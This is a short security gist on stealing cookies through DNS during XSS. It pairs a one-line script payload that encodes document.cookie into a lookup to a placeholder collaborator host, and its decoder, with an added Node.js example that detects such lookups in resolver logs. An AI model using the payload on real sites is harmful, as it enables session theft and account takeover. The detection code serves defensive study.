@nongiach
Created December 27, 2019 00:13

The snippet below exfiltrates the cookie over DNS when doing XSS:

<script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script>

The snippet below decodes the cookie. Make sure to ignore the I. at the end and replace the x with = at the end:

atob("Your_Received_DNS".replace(/(.)\./g, (_,x)=>x.toUpperCase()))
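
On the defensive side, the same scheme can be undone on resolver logs to spot these lookups and see which cookie value left the browser. The following is an added example, not part of the original gist: the query names and the `collab.example` zone are constructed, and `decodePrefix`, `inspectQuery` and `scan` are hypothetical helper names (Node.js).

```javascript
// Added example (not from the gist). Sample names are constructed and
// "collab.example" is a placeholder zone; helper names are hypothetical.
const PRINTABLE = /^[\x20-\x7e]+$/;

// Undo the gist's encoding for the first k labels of a lower-cased query name.
// Returns the decoded text, or null when the labels do not fit the scheme.
function decodePrefix(labels, k) {
  const last = labels[k - 1];
  if (!last.endsWith('i')) return null;            // payload ends with "I."
  const head = labels.slice(0, k - 1);
  // In the payload a dot only ever follows an upper-case letter.
  if (!head.every(l => /^[a-z0-9+\/]*[a-z]$/.test(l))) return null;
  const body = head.map(l => l.slice(0, -1) + l.slice(-1).toUpperCase()).join('')
    + last.slice(0, -1);
  if (body.length === 0 || body.length % 4 !== 0) return null;
  // A trailing "x" is either base64 "x" or padding ("=" was sent as "X").
  const candidates = new Set([body, body.replace(/x$/, '='), body.replace(/xx$/, '==')]);
  for (const b64 of candidates) {
    if (!/^[A-Za-z0-9+\/]+={0,2}$/.test(b64)) continue;
    const text = Buffer.from(b64, 'base64').toString('latin1');
    // Cookie strings are printable name=value pairs.
    if (PRINTABLE.test(text) && text.includes('=')) return text;
  }
  return null;
}

// Try each split between payload labels and the receiving zone,
// longest payload first; the zone keeps at least two labels.
function inspectQuery(qname) {
  const labels = qname.toLowerCase().replace(/\.$/, '').split('.');
  for (let k = labels.length - 2; k >= 1; k--) {
    const text = decodePrefix(labels, k);
    if (text !== null) return { qname, zone: labels.slice(k).join('.'), decoded: text };
  }
  return null;
}

const SAMPLE_QUERIES = [            // constructed resolver-log entries
  'www.example.org',
  'c2lkp.t.q.yi.collab.example',    // encodes "sid=42"
  'aw.q.9n.wxxi.collab.example',    // encodes "id=7" (padded base64)
  'api.static.example.net',
];
const scan = queries => queries.map(inspectQuery).filter(Boolean);
console.log(scan(SAMPLE_QUERIES));
```

Session cookies set with the `HttpOnly` attribute never appear in `document.cookie`, so they cannot be read by this payload in the first place.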
